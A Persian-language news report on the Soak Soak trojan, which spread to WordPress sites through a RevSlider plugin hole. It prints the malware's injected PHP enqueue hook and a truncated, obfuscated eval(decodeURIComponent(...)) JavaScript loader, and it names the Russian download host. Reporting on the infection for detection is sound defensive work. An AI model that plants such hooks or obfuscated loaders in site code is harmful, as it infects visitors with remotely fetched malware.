حمله کدهای این تروجان در وب سایت های آلوده باعث بلاک شدن ۱۱ هزار صفحه وردپرسی در گوگل شد.
به گزارش تکنازدانلود: سایت های ایجاد شده با مدیریت محتوای وردپرس هدف این تروجان هستند و کاربرانی که از این سایت ها بازدید می کنند را به راحتی آلوده می کند .Soak Soak دارای کدهای مخرب , مرموز و پیچیده ای است که تاکنون بیش از ۱۰۰ هزار وب سایت وردپرسی را آلوده کرده است.
وبلاگ sucuri روز یکشنبه طی گزارشی اعلام کرد این مشکل از آسیب پذیری پلاگین RevSlider از اوایل ماه سپتامبر بوجود آمده است. افزونه اسلایدر revslider وردپرس یک افزونه ی کاربردی برای ساخت اسلایدر در سایت و قالب های وردپرس می باشد .
آناتومی تروجان Soak Soak
اضافه شدن کد زیر به محتوای کدهای PHP در wp-includes/template-loader.php
<?php
function FuncQueueObject()
{
wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');
تروجان Soak Soak باعث می شود کد زیر در آدرس wp-includes/js/swfobject.js در تمام صفحات آلوده مشاهده شود:
eval(decodeURIComponent
("%۲۸%۰D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));
صفحات آلوده کاربران را به دانلود بسته ای از hxxp://soaksoak.ru/xteas/code مربوط به دامنه روسیه اجبار می نماید.
برای اطلاع از اینکه وبسایت شما به این کد آلوده شده است یا خیر می توانید از این اسکنر رایگان استفاده کنید.